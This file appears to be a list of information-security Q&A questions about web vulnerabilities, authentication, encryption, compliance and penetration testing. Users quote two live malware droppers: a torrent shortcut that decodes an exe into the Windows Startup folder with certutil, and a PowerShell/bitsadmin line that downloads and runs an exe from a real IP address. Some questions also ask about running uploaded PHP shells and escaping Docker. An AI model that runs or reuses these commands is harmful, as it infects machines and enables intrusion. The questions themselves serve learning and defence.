instruction
stringlengths
24
29.9k
I'm reading OWASP Top 10 - 2017 The Ten Most Critical Web Application Security Risks, and came across the following risk, under Broken Access Control vulnerabilities: Metadata manipulation, such as replaying or tampering with a JSON Web Token (JWT) access control token or a cookie or hidden field manipulated to el...
I have a Qualys web application scan report that says I have a XSS vulnerability. It explains this was detected by requesting a malicious payload and evaluating the response. When I make the same request, I'm getting a different response that doesn't appear vulnerable. The request: https://my.site/asection/Some%20Param...
I'm curious to how an attacker would enable RDP/SSH and use it to gain further access to the compromised windows server after achieving remote command/code execution on the server. (Using cmd.exe)
I'm testing some API endpoints aaand with some arbitrary crazy tests, like: GET /products/items HTTP/1.1 Host: api.companysite.com Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.12 (KHTML, like Gecko) Maxthon/3.0 Chrome/26.0.1410.43 Safari/535.12 Connection: keep-alive Content-Le...
When reading something dealing with Common Criteria for Information Technology Security Evaluation it is clear where ABC_DEF-type acronyms come from - they are thoroughly described in parts 2 and 3. But where do Threats, Policy, Assumption (T.[SOMETHING], P.[SOMETHING], A.[SOMETHING_ELSE] and O.[SOMETHING]-type stuff)...
HTML comments can be notoriously tricky from an XSS standpoint, and the standard recommendation seems to be to never put untrusted user data in them. But shouldn't it be possible to strip out a few characters and make it safe? My theory is that the following should be enough: > for closing the comment. [ for condition...
I have a website on which users can select a file from their local machine, manipulate it and then save it. The website is written entirely in JavaScript to ensure it's purely client-side. Is the content of the file that the user selects completely secure (from the perspective of the website itself, I realise the user ...
Our company suffered a phishing attack yesterday. While investigating about the attacker and the potential employees of ours who might have been phished, we ended up with the attacker database of phished users. This database include user email and passwords (~40) from multiple companies (~10) who seems to be sharing th...
I have a website with a client-side HTML contact form created manually (not as output of an HTML constructor like PHP): <form action="mailto:someone@example.com"> Email Adress:<br> <input type="email" name="email_address" value="" maxlength="100" /> <br> <input type="submit" value="Submit" /> </form> I...
I'm having troubles with ms08_067_netapi. I have a private network with a web server (10.10.2.10), windows 7 (10.10.2.8) and windows XP (10.10.2.9). I'm hacking from outside the private network with kali (10.0.2.15) the web server then I make portforwarding to attack the windows 7. The windows 7 attack is working but w...
If I am having an RSA SecureID hardware key, I can see serials/numbers at the back of the SecureID (so not the every-minute changing token)? Is that public information? Or should the serials on the back of an RSA SecureID be held private/confidental?
A lot of programs today allow to install into user appdata subdirectory to avoid installing system wide. Is there any advantage of this? Can programs installed system wide be more exploited than those installed locally? Edit: Updating question to be more clear: I know the security risk of letting admin rights to execut...
I want to understand how the robots.txt file can be use by an attacker. I know it can contain a list of paths and directories. Is that all or can we find more information in it?
We are a small US-based startup with most of the employees working remotely from other countries (less than 10 people in total) and currently are building a SaaS web platform for banks (everything is hosted in AWS). I was tasked with an assignment to investigate what we should do to get SOC 2 type 2 report (one of our ...
I am looking to buy an external 1TB hard drive to store sensitive information on. External hard drives aren't (physically) small, and it may have to be left unattended at times. What can I do to increase the hard drive security so that if any physical or software tampering is done, I would be able to detect it?
I've read a lot about Implicit Grant Flow and when it should be used, but I can't wrap my head around a use case for where it would have made sense over the Authentication Code Grant Flow before PKCEs were a recommended option. Here is what I know so far: Implicit Grant Flow is less secure than Authentication Code Gra...
Sometimes we have contract developers that need to do work on the server (via ssh or sftp) and I've been looking for ways to monitor what they do on our Debian based server. We have ways of limiting access (restricting access by IP) so they only have access when we have them working on something but we would like to be...
My organization is going through a PCI-DSS compliance process. As part of that, we're contracting out our external and internal vulnerability scans. The contractor is asking for admin access to our servers so they can verify that all our software and operating systems have been fully patched to the latest versions. To ...
I have read that many iOS exploits target the Safari browser. Would using another browser on my iOS device be safer? Does Safari being a system app give it more access to the OS than a third party browser that I install through the App Store?
I would like to know if it would be an issue to use this code in a production environment: RewriteCond %{HTTP_HOST} ^(?:www\.)?([a-zA-Z0-9_-]+)\.(?:com|co\.uk|es|de)$ RewriteCond $1 ^sitemap([0-9]+)?\.xml(\.gz)?$ RewriteRule ^(.*)$ /files/%{HTTP_HOST}/$1 [L,QSA] Basically, I have hundreds of domains pointing to the sa...
How can I as a trusted user of a middleman company (such as PhishTank) verify whether a phishing site is valid if the scam listens only on a unique referrer link(randomly created) and is blocking any other access methods? To throw a threat scenario into scene. An attacker sent an email to a local bank officer, the emai...
I have been playing around with sending emails via telnet using text commands. Theoretically... Say I send an email from a typical mail agent that adds a dkim signature from a@a.com to b@b.com. If I grab the message source (just including the headers listed in the DKIM-Signature header and the body) from b@b.com an...
If what this says is what I think, does that mean the connection could be compromised and or vulnerable to MitM &/or other attacks? Cert shows to be good, but there is this "RSA key exchange is obsolete. Enable an ECDHE-based cipher suite", which makes me question if its legit..?
I have two private ssh keys, - one was originally created with ssh-keygen the other one with a python script. They are supposed to be the same, however one works for authentication and the other one doesn't. After analyzing them with https://keytool.online/ and there seems to be one minor difference when comparing them...
Security experts are constantly discouraging users from using SMS-based 2FA systems, usually because of worries the auth code could be intercepted by an attacker, either through a SIM swap or a MitM attack. The problem I see with this statement is that both of these attacks to me feel like they're essentially only real...
I managed to upload a PHP shell using an upload form with some tweaking. No such restrictions except it renames the uploaded file to md5. But when I tried to execute the shell, It shows a 500 error. I am able to view or download all other files such as HTML, JS, JPG etc. On digging further, I found that there is a .hta...
I've been studying Docker security and examining ways of escaping from container to host. Suppose Docker sock (docker.sock) is mounted into the container at /var/run/docker.sock, so that Docker client (docker) can send commands to Docker daemon (dockerd). To execute commands on the host, I could run another container a...
I came across http://test.co.uk/img/rOTJwSOqWzHaDsEUcHhI. If we take a look at it the directory space is protected against bruteforcing of the whole directory to explore private images. I don't know the official name for this and want to implement it on my own domain, is there an official paper for to do this?
We have a scenario where we need to prevent two users from using the same identifier. The identifier is sensitive (e.g. a social security number), so we do not want to store it in our DB. We just want to store some sort of hash that allows us to prevent subsequent users from using it again. And we want to do it securel...
I noticed a severe data leak on a Chinese website allowing me to access other users' phone numbers, addresses and names. Should I report this? I don't want the higher management at the company to assume I was purposefully hacking their site & take legal action.
Most naming convention standards for Active Directory I have come across so far have security groups starting with an underscore to allow the equivalent distribution list to be user-friendly. I am now writing a naming convention for Azure AD implementation and was wondering whether others are still using a this convent...
Is it right that if there is a malicious browser extension allowed to "Read and change all your data on the websites you visit." on the users's machine an access token can be potentially leaked no matter how securely you store it ?
Can host app see traffic before network encryption? E.g. can a host-based VPN app see cleartext traffic (http to https) to make any traffic routing decisions? Considering the TCP/IP model, all operate at the Application layer.
Does HSTS protect a domain from a publicly trusted CA that has gone rogue issuing a illegitimate valid certificate? Examples of publicly trusted CA's would be any of the members of the Mozilla CA Bundle. Is there any way to protect a domain from having an illegitimate but publicly trusted CA issue a valid certificate? ...
Hackers can hack the SD memory card micro controller and physical tampering to modify the SD card firmware or hardware. https://media.ccc.de/v/30C3_-5294-en-_saal_1_-201312291400-_the_exploration_and_exploitation_of_an_sd_memory_card_-bunnie-_xobs How can I create a tamper proof SD card?
I have a Corona SDK sample project that contains only the following code: -- The following sample code contacts Google's encrypted search over SSL -- and prints the response (in this case, the HTML source of the home page) -- to the Corona terminal. local function networkListener( event ) if ( event.isError ) the...
Are there any dangers of extending my PATH, say by adding /Users/me/bin?
At places like Google, where some users use Linux and others use Windows and even Mac, how are they managing IDAM? For example have a single directory service (probably highly customised)? is it split into several controllers, say Linux, Mac and Windows? or do they just use local users?
I can't seem to find an answer to this seemingly simple question. Say, on Windows, if I have a binary file: How can I tell if it was signed with an extended validation (EV) code-signing certificate? Say, the file above, being a Windows driver on a 64-bit Windows 10 has to have an EV signature to be able to load. So I ...
Iphone uses by default 6-digit PIN that has an entropy of 19.93 bits When iPhone processes the fingerprint, how much entropy does it have? How long should standard passphrase be until it is as secure as touch id fingerprint? Is there any research paper on the iphone's touch id sensor entropy?
I recently saw the app below in my phone. Have disabled it immediately when I saw it. Have no idea: what it is why it's in my phone how long it's been there and how to uninstall it (there's no uninstall option as you see in the screenshot) Just wonder if anyone has experienced this issue (probably with another app, ...
For school, I am trying to run a mitm attack using bettercap. I can sniff the traffic without problems, but the real problem is that the victim computer browser times out or says "it is impossible to reach this page". All of this while navigating through http pages. Could anyone help please? I might have missed someth...
I work at a WeWork and am surrounded by about 5 different IT / coding type of companies. They apparently hacked me somehow, I don't know how, whether it was bluetooth or using WeWork wifi, or maybe the screen sharing app used to control monitors WeWork uses or the Papercut print client. Somehow they were on my PC, as ...
Let's say I want to secure authentication on a web app or a mobile app or even a machine to machine app. My first approach to secure the password is to enable HTTPS and some sort of client-side message-level encryption of data to be sent over the wire. I think that since MITM could help circumvent HTTPS and discover at...
At home I use a router (Huawei B528s-23a), the default device which my provider recommends. Over the last couple of days I often get a certificate error when opening a website which was obviously not the routers page. In Safari for example: It's seems that the router answers the SSL-Connection instead of the page I wa...
Is there any way to clone my Student ID card for use with my Android Phone? I found an app for cloning MIFARE Classic cards, but it shows my card as a DESFIRE I realize it's exactly the sort of thing the system is supposed to protect against, but I have no malicious intent! I just want to simplify the daily contents o...
In relation to this question about credit card receipts, is it safe to just throw away receipts where I have used a debit card? In addition, would it be any more worth while burning/shredding receipts before throwing them away?
We have an iOS/Android app communicating with a central database. Each account created from the app, has an associated private key stored there, used to encrypt some private info needs to be stored in the server. When the user creates an account on device (A), and then login from their other device (B), they fetch th...
I want to figure out how safe is to implement a 15 bytes long password reset token. If we have 26 letters and 10 numbers, 36 possibilities per byte. And we have a 15 byte long token, that means that the total amount of possibilities is 36^15. Is it possible to brute-force and find a token in a reasonable amount of time...
We have a website that uses Stripe for charging customers. We are selling a physical product that has zero resale value and a service that is completed 30 days after the customer receives the physical product. In other words, the customer gains nothing from using a stolen credit card if it's discovered quickly. The ave...
I have used Amazon pre signed url to share content. https://boto3.amazonaws.com/v1/documentation/api/latest/guide/s3-presigned-urls.html Is google able to crawl this url? I'm sharing this url with just one client. What about other services? there are some of theme that let you share content with someone by creating a s...
People are making a big fuss about how you absolutely have to disable SSLv3 because TLS can be downgraded to SSLv3 and there is barely a server left on the internet that speaks SSLv3. At the same time, almost every mail server out there will happily support STARTTLS, which can be trivially (like: 3 lines of code or so)...
I'm trying to use a John ruleset which seems to take up more space than I have available. Is there a way to pipe John into Hydra?
I am helping my school IT set up a RADIUS authentication system using PEAP/EAP-TTLS. We are able to achieve successful connection with the user devices, but the users need to accept a "Not trusted" self-signed certificate. I am considering using the free LetsEncrypt to generate such a certificate. However, LetsEncrypt ...
According to this page and site, small files are kept in Master File Table when filesystem is NTFS. Let's assume that computer is using Windows 10 and a SSD drive with TRIM support. If a user manually deletes a file smaller than 1kb from ssd will TRIM erase that file from MFT or is it recoverable at there? How about t...
I am trying to convert a client certificate from a pkcs12 type to a pem file using openssl, but this error is showed on my terminal. Does anyone have any idea why this is happening? I haven't edited or manually changed the p12 file. Even when I try to get some info from the .p12 file it shows error. # openssl pkcs12 -i...
Bit new in ssh and have an issue in understanding. I got a code which uses ssh_auth_list routine as below. method = ssh_auth_list(session); printf(" %d " , method); I am using a ssh library and when I am calling this routine.I am seeing return value 20 for some linux servers and 38 for others. As this is a .lib only. ...
I see advantage of using container in it that offer work with more files rather than with one but is there some advantage in encryption technique?I would like to know if it encrypt each single file in a container (or an archive) or is there some another technique used to encrypt it?I want create my own file container a...
I like to overwrite my harddisk with random data. Since /dev/urandom as source is too slow to overwrite a large amount of data in a reasonable time, I'm looking for a good alternative. These two options meet my speed requirements: (1) openssl with AES openssl enc -aes-256-ctr -pass pass:"$(tr -cd '[:alnum:]' < /dev/ur...
I typed following script on the search input on the website alert() but website converted this script into &lt;script&gt;alert()&lt;/script&gt; in HTML content, is there any possible way to bypass this security
I unplug my microphone from my computer when I am not using it. The same with my webcam. I am not using Alexa or similar. However, my smartphone has an included battery that I cannot take out. My phone might indicate that it has no wifi connection, but I don't know if it is lying to me. The same is true with the microp...
I've just started a risk management course at university and it is confusing the hell out of me. So, we have a question that states the following: "An online marketplace has monitored their risk and found that over three years there were 400 attempted DDoS attacks on their website. Of those 400 attempts, five of t...
mimikatz can decrypt DPAPI with masterkey: dpapi::blob /in:"test" /masterkey:X /unprotectXXX How can I dump the masterkey and do the decrypt job offline?
I was reading about this device the author made, however he did not specify WHAT he was able to steal from a locked computer. What credentials does this steal? https://room362.com/post/2016/snagging-creds-from-locked-machines/
As I understand, key exchange for secure communications like TLS has a client take a server's public key, generate a random AES key and send that as a shared key for further communication. The key is generated using a cryptographically secure random number generator where the seed is obtained via system entropy. I ass...
Reading from this question Why does the SSL/TLS handshake have a client and server random?, the OP asks why he can't use the premaster secret directly and the accepted answer says: ... preventing any replay attack. I don't understand why it can't prevent replay attack if I use the premaster directly. The premaster is...
It is probably common enough knowledge now that you should not plug into your computer any device that an attacker has had physical access to. Especially USB devices. Thanks to the many tutorials on how to make your own RubberDucky/BadUSB, it is very easy and simple for any malicious actor to make one especially using ...
I am hosting more than 20 WordPress website on a single server. The server has other cms based websites too. For better security, I have used CloudLinux CageFS which encapsulates each customer. Even if one WordPress site gets hacked then there is no way that hacker will be able to find other users in the server. S/he c...
I downloaded a torrent which turned out to be a shortcut that did the following thing. %ComSpec% /c certutil -decode "Succession.S02E07.720p.WEB.x265-MiNX.mkv.lnk" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\%USERNAME%.exe" >nul 2>&1 && "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\%USERNA...
I'd like to learn a bit more about MD5 collisions. So let's assume I have a message m: m = somesecretmessage And I hash that message: z = md5(m) The only know information is z. I do not know m. How would I be able to generate a file/string that would result in the same md5 hash as z? Also would it be easier if the leng...
I have a database table with accounts. I'm using PBKDF2 to create hashes from passwords. The passwords are of the correcthorsebatterystaple type, so we assume they are secure and unique. There are no usernames, so I need to be able to find the matching account from an entered password. To make the hashes indexable, I'm...
I'm trying to gain access to a web server after I found blind SQLi on the website. I used sqlmap to automate things. I can read the databases and tables. tried to find a way to get a shell from SQL injection. I found a lot of topics, some of them talk about UDF lib., and the other is talking about outfile! I start to...
Why can any application or user on your server type an insecure URL like these to get server information about that instance? http://instance-data.us-east-1.compute.internal/latest/meta-data/ http://metadata.google.internal/computeMetadata/v1/ http://169.254.169.254/metadata/instance?api-version=2019-04-30 Doesn't it...
What is the difference between Identity Management products (such as Forefront/MIM, PicketLink, OpenIDM) and Identity Access Governance tools (such as Sailpoint,Savyint, CyberArk)? Apologies for another one of these terminology questions, I did look at the 'what is IAM' question but it seems to be broader and the respo...
I was wondering if there are any general recommendations on maximum resolution times for vulnerabilities. Consider a vulnerability/patch management process where a ticket is opened when a vulnerability is reported/detected. The ticket system sets a maximum resolution time based on details of the vulnerability, such as:...
Say there are two queries, which are called after each other: one to get the amount datasets in the table, one to get the result of the actual query: select count(*) as total from table_a where someCol='abc' and someOtherCol= 'someVariable' select * from table_a where someCol='abc' and someOtherCol= 'someVariable' som...
Our hosting provider wants to update our legacy application server (Plesk). We usually place older PHP projects (PHP 5.3 - 5.6) there, so they can sit in a stable environment until their unknown EOL. Now the thing is, our provider wants to remove these old PHP versions for "security reasons". But I'm failing to see, ho...
In SSH, does the client have any power in determining the key size of the host key, or is it completely dependent on what the servers host key is? For instance, say the client and server agree on using ssh-rsa or ssh-dss. Is the connection automatically secured with the key size of the SSH server? Is it possible for ...
Should we generate a strong password offline, keep it closely guarded secret, and use the same one across all copies of the device? The boot drive is eMMC flash soldered on the PCB, hard to read bypassing the OS. Or should I write code that on the first boot changes the password to salted hash of the device serial numb...
Are there any off the shelf alternatives that come close to achieving the same results as Content Security Policy (CSP)? I understand the importance of CSP but it soon becomes unmanageable with inline script hashes and the inability to allow unsafe-inline and unsafe-eval per third-party domain. Also, managing the CSP w...
We do not store PAN card data, but we do store other non-PAN data such as expiration date, billing zip, and cardholder name. We store this info for use with card-on-file tokens provided by our payment processor. Do we need to encrypt this non-PAN data in our database without the PAN? We expect to qualify for PCI-SAQ ...
If I disagree with Let's Encrypt's cavalier attitude about SSL certificate issuance, and their indifference to their auto-generated certificates potentially being using for widespread criminal activities, how can I automatically disable all of my organization's web browsers and other software that uses internally store...
We're not using Adminer for database management yet for some reason adminer_sid & adminer_key cookies are being set in the browser - any idea how to stop them from being set? Where would they be coming from? Someone/bot recently accessed our server & when we tried to access the website we were directed to an Adminer lo...
I understand how Cross-Site Request forgery happens, but I'm very unclear about how to protect against it using a SPA(React) application. For instance, my current strategy is to, on login, send a csrf token to the client as a cookie, the on the client, grab that cookie and include it in the req.body or in a custom hea...
Would it be possible for someone to hijack the response of an API by using the host file, so for example www.sitename.com calls api.sitename.com/api/products. Could I use the host file to redirect the call api.sitename.com/api/products to a local instance of the API? If so does that vulnerability have a name? A diagra...
Can there theoretically be any possible malicious code hidden in .ics files, which would steal your calendar data or something similar? For an example case, we'd be importing the .ics file into Google Calendar.
I was AFK for a few hours. This is what I saw in my LibreOffice document when I returned to my laptop: cmd.exe /c PoweExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://92.63.197.153/cawk.exe','%temp%\40006605040.exe');Start-Process '%temp%\40006605040.exe' rcmd.exe /c bitsadmin /transfer get...
How could a phone number be used as a means to gain access to a smartphone? I am reading claims that you could receive a call or SMS on your phone and an attacker can install their malware that way. Are methods like that possible? That seems a bit over the top to believe. What exactly are the methods used to install ma...
What is the formal name -- and description -- of the problem of giving users access to a resource exactly once each while not requiring them to identify themselves? In other words, to have a system that is able to give away access tokens to users as long as they have never obtained any before. Assuming that users are a...
The Oauth PKCE protocol flow is as follows, as defined in RFC 7636: +-------------------+ | Authz Server | +--------+ | +---------------+ | | |--(A)- Authorization Request ---->| ...
I am currently writing an application which needs to store user data encrypted in the database. One of the requirements is that some of the data stored in the database needs to be encrypted in a way that we (the database administrators, with full read access to the raw data in the table) can not decrypt it. Clearly, we...
I'm developing an application which will need to derive a private/public key pair from a user provided password, and then use the public key to encrypt some text (up to 1000 characters in length) such that it can only be decrypted by the paired private key. The password and private key will not be stored anywhere, so t...
Let's say for instance I have some USB devices I suspect of being programmed for to execute keystroke injection. If I were to load a live OS and switch it to runlevel 1, then logged into an unpriviledged user and ran a text editor like nano before plugging one of the devices in, would this be a good way to catch a keys...
We have a third party mobile app that will link to a dashboard in our web app. The user id needs to be passed from the mobile app to the web app in this interaction so that we can retrieve the user's data in the web app. The user is logged in in the mobile app and we need to sign them into the web dashboard without pro...
I am currently testing a new AI/Machine Learning antivirus solution. I installed it on a laptop and i manage through the dashboard on a different laptop. I am now testing how quickly it picks up stuff and how it alerts the administrator. An EICAR file won't work due to the way this particular antivirus works (if it doe...
I"m trying to crack passwords that contains at least one symbol, e.g qwe@123 I'm reading through the cheat sheet here, didn't find anything relevant, does anyone know?
If I send someone an email using Outlook online, can the recipient know my IP? I knew before that it was possible but I was wondering if the email providers like Outlook, Gmail had added some sort of security for that?
I'm planning to implement a (slightly non-standard?) JWT authentication scheme with refresh and access tokens, in which refresh and access tokens use different signing algorithms: refresh token uses HS256 and is only processed by The Main Application access tokens use ES256. The Main Application signs the access token...
HPKP was used to ensure that a browser accepts to connect to a site only if the public key he has on file is the one presented by the target site. I saw it as a way to make deep content inspection more complicated (some sites would simply not accept the connection so there is nothing to inspect). It seems however (from...
I don't know whether something like this exists but I think it would be really useful if a privacy rating system would be established across all websites and apps. An example would be something like ratings in movies: https://en.wikipedia.org/wiki/Motion_Picture_Association_of_America_film_rating_system Example of priv...